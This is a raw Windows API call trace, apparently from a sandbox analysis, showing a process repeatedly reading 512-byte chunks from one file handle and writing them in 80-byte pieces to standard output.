[0194.841] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] GetFileType (hFile=0x50) returned 0x1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] GetFileType (hFile=0x50) returned 0x1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] GetFileType (hFile=0x50) returned 0x1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] GetFileType (hFile=0x50) returned 0x1 [0194.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.841] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] GetFileType (hFile=0x50) returned 0x1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] WriteFile (in: hFile=0x50, 
lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.842] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.842] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] GetFileType (hFile=0x50) returned 0x1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] GetFileType (hFile=0x50) returned 0x1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] GetFileType (hFile=0x50) returned 0x1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] GetFileType (hFile=0x50) returned 0x1 [0194.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.842] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.843] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0194.843] GetFileType (hFile=0x50) returned 0x1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] GetFileType (hFile=0x50) returned 0x1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] GetFileType (hFile=0x50) returned 0x1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] GetFileType (hFile=0x50) returned 0x1 [0194.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.843] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.843] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.843] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, 
lpOverlapped=0x0) returned 1 [0194.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.844] GetFileType (hFile=0x50) returned 0x1 [0194.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.844] GetFileType (hFile=0x50) returned 0x1 [0194.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.844] GetFileType (hFile=0x50) returned 0x1 [0194.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.844] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] GetFileType (hFile=0x50) returned 0x1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] GetFileType (hFile=0x50) returned 0x1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] GetFileType (hFile=0x50) returned 0x1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 
| out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] GetFileType (hFile=0x50) returned 0x1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] GetFileType (hFile=0x50) returned 0x1 [0194.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.845] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.845] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.845] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] GetFileType (hFile=0x50) returned 0x1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] GetFileType (hFile=0x50) returned 0x1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] GetFileType (hFile=0x50) returned 0x1 [0194.846] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0194.846] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] GetFileType (hFile=0x50) returned 0x1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] GetFileType (hFile=0x50) returned 0x1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.846] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 
[0194.847] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.847] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.847] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.847] GetFileType (hFile=0x50) returned 0x1 [0194.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 
[0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] GetFileType (hFile=0x50) returned 0x1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] GetFileType (hFile=0x50) returned 0x1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] GetFileType (hFile=0x50) returned 0x1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] GetFileType (hFile=0x50) returned 0x1 [0194.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.848] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.848] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.848] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.848] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.848] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, 
lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] GetFileType (hFile=0x50) returned 0x1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] GetFileType (hFile=0x50) returned 0x1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] GetFileType (hFile=0x50) returned 0x1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] GetFileType (hFile=0x50) returned 0x1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] GetFileType (hFile=0x50) returned 0x1 [0194.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.849] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] GetFileType (hFile=0x50) returned 0x1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] GetFileType (hFile=0x50) returned 0x1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] GetFileType (hFile=0x50) returned 0x1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.850] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.850] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] GetFileType (hFile=0x50) returned 0x1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] GetFileType (hFile=0x50) returned 0x1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] GetFileType 
(hFile=0x50) returned 0x1 [0194.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.850] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] GetFileType (hFile=0x50) returned 0x1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] GetFileType (hFile=0x50) returned 0x1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] GetFileType (hFile=0x50) returned 0x1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] GetFileType (hFile=0x50) returned 0x1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] GetFileType (hFile=0x50) returned 0x1 [0194.851] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0194.851] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.851] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.851] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] GetFileType (hFile=0x50) returned 0x1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] GetFileType (hFile=0x50) returned 0x1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] GetFileType (hFile=0x50) returned 0x1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] GetFileType (hFile=0x50) returned 0x1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, 
